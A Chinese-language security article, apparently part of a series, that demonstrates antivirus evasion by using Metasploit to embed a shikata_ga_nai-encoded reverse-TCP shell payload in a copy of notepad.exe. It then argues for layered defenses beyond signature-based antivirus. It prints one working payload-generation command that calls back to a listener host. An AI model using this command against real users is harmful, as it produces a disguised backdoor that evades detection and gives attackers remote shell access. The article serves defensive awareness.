在《防病毒规避技术轻松逃避防病毒软件检测（一）》中，笔者使用模糊处理来规避检测，本文他将使用渗透测试框架封装漏洞。

　　使用渗透测试框架封装漏洞

　　笔者的下一个测试使用了流行的Metasploit社区版渗透测试框架。该工具因其开放贡献式的开发和灵活性而闻名。封装漏洞或进入文件的后门程序功能是几年前增加的关键功能，该功能可以应用到渗透测试中。很多流行的文件格式可以通过该工具来创建，包括PDF和所有标准微软Office格式。该工具还可以从默认微软windows程序文件中获取模板，生成可执行文件。毫无戒心的用户很可能会运行“notepad.exe”，并不会发现它已经被修改。这就是渗透测试者如何规避防病毒引擎，以及模拟恶意软件编写者如何生成逼真的恶意代码。

　　笔者通过以下命令运行了几个标准微软Windows可执行文件来测试防病毒软件检测率：
msfpayload windows/shell/reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe

　　这被输送到编码器，它使用shikata ga nai编码器输送五次，在日语中是“没办法”的意思，在这里也指Metasploit用以创建可执行文件的多态XOR添加反馈编码器。最后的notepad2.exe通过使用notepad.exe作为模板来生成。受害者将执行notepad2.exe以及创建到192.167.1.75的C&C服务器的后门连接。

　　然后我们上传和扫描notepad2.exe来测试前面测试中的相同防病毒引擎的检测功能。Virustotal.com的所有46个防病毒引擎都完全没有通过这个测试，没有任何一个引擎（包括微软、赛门铁克和McAfee）检测出编码在该文件中的后门程序。但这并不奇怪。这个结果是我们意料之中的，它证明了基于签名的防病毒引擎的局限性—防病毒引擎必须之前看过恶意软件才可能检测出它。

　　请注意，这些测试都是非科学性的，这并不意味着防病毒软件无法抵御恶意软件攻击。但这表明，防病毒软件只是用以保护企业计算资产的整个深度防御战略的一部分，正如赛门铁克在对纽约时报文章的回应声明中所写的。

　　不止反恶意软件  还要增加其它技术

　　最后首席信息安全官现在应该采取行动，让企业考虑除了反恶意软件系统，还要增加额外的安全技术。例如，反恶意软件可以结合白名单，这样只有经批准的程序可以在客户端机器上运行。下一代防火墙、IPS/IDS和web过滤系统都可以用于检测异常网络流量，因为异常流量几乎总是伴随着恶意软件感染。当然，如果没有人的干预，没有哪个系统能够保证其效力，所以企业需要部署一个专业的安全人员来负责监控企业所使用的安全系统。

　　最近防病毒软件已经饱受批评，这使人们开始质疑防病毒软件是不是没用。防病毒软件是有用的，但它只是整体防御战略的一部分。即使是最基本的攻击都可以轻而易举的有效模糊化，正如上面所述，这进一步证明，有效的信息安全永远不应该只是依赖于一种产品或者安全层，而应该依赖于多层和多种技术来进行全面的风险管理。纽约时报事件和其他类似事件应该作为催化剂，推动企业部署新出现的反恶意软件。